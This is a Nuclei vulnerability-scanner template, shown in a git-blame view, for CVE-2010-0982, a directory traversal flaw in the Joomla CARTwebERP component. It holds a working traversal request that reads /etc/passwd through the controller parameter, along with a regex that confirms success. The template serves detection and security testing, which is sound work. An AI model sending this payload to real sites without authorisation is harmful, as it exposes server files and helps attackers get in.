nuclei-templates/http/cves/2010/CVE-2010-0982.yaml

40 lines
1.2 KiB
YAML
Raw Normal View History

2021-09-27 11:02:48 +00:00
id: CVE-2010-0982
2021-09-27 11:02:48 +00:00
info:
name: Joomla! Component com_cartweberp - Local File Inclusion
author: daffainfo
2023-07-11 19:49:27 +00:00
severity: medium
description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
2021-09-27 13:06:48 +00:00
reference:
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/10942
- https://nvd.nist.gov/vuln/detail/CVE-2010-0982
remediation: Apply all relevant security patches and product upgrades.
classification:
2022-09-06 01:33:31 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2010-0982
2022-09-06 01:33:31 +00:00
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.0087
cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.80286
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: joomlamo
product: com_cartweberp
tags: cve,cve2010,joomla,lfi,edb
http:
2021-09-27 11:02:48 +00:00
- method: GET
path:
2021-09-27 13:06:48 +00:00
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
2023-07-11 19:49:27 +00:00
2021-09-27 11:02:48 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
2021-09-27 11:02:48 +00:00
- type: status
status:
- 200